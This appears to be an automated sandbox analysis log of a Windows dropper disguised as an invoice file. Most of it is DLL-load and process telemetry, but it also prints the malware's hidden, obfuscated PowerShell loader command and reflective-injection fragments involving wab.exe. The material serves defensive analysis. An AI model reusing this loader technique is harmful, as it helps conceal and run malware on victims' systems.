          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Q20240425 MAX5073626.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Frakkelommes $Recirkuleringers $Noting), (Discoloring @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brainard = [AppDomain]::CurrentDomain.GetAssemblies()
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fusel)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bidragsberettigedes, $false).DefineType($Overdriven
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D43895 push cs; ret 1_2_08D438C8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4E0B6 push esp; ret 1_2_08D4E0B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4D861 push 34977B93h; iretd 1_2_08D4D89C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4CC01 push cs; ret 1_2_08D4CC10
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4B9DD push esi; ret 1_2_08D4B9DE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4AD72 push cs; ret 1_2_08D4AD88
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D45A98 push ebx; retf 1_2_08D45AA0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4AAA0 push ecx; retf 1_2_08D4AACB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D45252 push ebx; iretd 1_2_08D45253
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4AA79 push cs; ret 1_2_08D4AA7C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4DE0B pushad ; ret 1_2_08D4DE19
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4AE3D push cs; ret 1_2_08D4AE40
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D4576E push es; retf 1_2_08D45774
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D45306 push es; retf 1_2_08D45308
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6B9DD push esi; ret 7_2_03E6B9DE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6576E push es; retf 7_2_03E65774
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6AD72 push cs; ret 7_2_03E6AD88
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E65306 push es; retf 7_2_03E65308
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6AAA0 push ecx; retf 7_2_03E6AACB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6E0B6 push esp; ret 7_2_03E6E0B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E63895 push cs; ret 7_2_03E638C8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E65A98 push ebx; retf 7_2_03E65AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6D861 push 34977B93h; iretd 7_2_03E6D89C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6AA79 push cs; ret 7_2_03E6AA7C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E65252 push ebx; iretd 7_2_03E65253
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6AE3D push cs; ret 7_2_03E6AE40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6CC01 push cs; ret 7_2_03E6CC10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03E6DE0B pushad ; ret 7_2_03E6DE19
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exeJump to dropped file
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6645Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3197Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3490Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6181Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeEvaded block: after key decisiongraph_0-3570
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5064Thread sleep count: 3490 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596Thread sleep time: -93000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596Thread sleep count: 6181 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596Thread sleep time: -18543000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3490 delay: -5Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040673F
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeCode function: 0_2_004065F5 FindFirstFileW,FindClose,0_2_004065F5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
          Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXM
          Source: wab.exe, 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
